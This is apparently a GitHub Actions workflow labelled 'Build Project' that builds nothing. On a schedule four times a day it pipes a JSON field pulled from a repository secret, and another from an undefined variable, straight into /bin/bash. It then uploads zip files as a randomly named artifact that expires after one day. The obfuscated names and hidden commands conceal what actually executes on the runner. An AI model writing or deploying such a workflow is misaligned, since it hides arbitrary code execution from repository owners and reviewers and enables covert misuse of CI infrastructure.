name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '3 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  pipeline:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          t2: ${{ secrets.t2 }}
        run: |
          printf '%s' "$t2" | jq -r .ofsxk7 | /bin/bash
          echo $hfwrd00 | jq -r .dkmc84292 | /bin/bash

      - name: Persist output
        if: ${{ always() }}
        uses: actions/upload-artifact@v4
        with:
          name: GqN7FeFk
          path: "*.zip"
          retention-days: 1
